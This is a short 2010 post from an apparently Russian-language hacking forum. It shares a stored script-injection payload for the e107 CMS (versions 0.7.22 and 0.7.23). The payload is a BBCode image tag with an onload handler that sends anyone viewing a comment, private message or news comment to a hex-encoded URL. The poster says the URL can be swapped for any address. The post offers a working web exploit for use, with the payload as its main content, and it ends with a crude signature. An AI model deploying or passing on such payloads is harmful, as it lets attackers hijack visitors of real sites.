Показать сообщение отдельно
Старый 03.09.2010, 15:47   #41
padla
 
Регистрация: 05.07.2010
Сообщений: 10
Репутация: 1
По умолчанию

Проверял только на 0.7.22 и 0.7.23 Не совсем уязвимость, но можно запороть любой коментарий, будь то на форуме, лс или коментарий к пользователю и к новости.

достаточно вставить

Код:
[img onload=document.location.href=0x687474703a2f2f676f6f676c652e7275]http://host/e107_images/generic/bbcode/image.png[/img]
0x687474703a2f2f676f6f676c652e7275 - это захекшеный гугл, вставить можно любое

©by sw3n
__________________
Ебитесь, только не размножайтесь, пожалуйста. ©
padla вне форума   Ответить с цитированием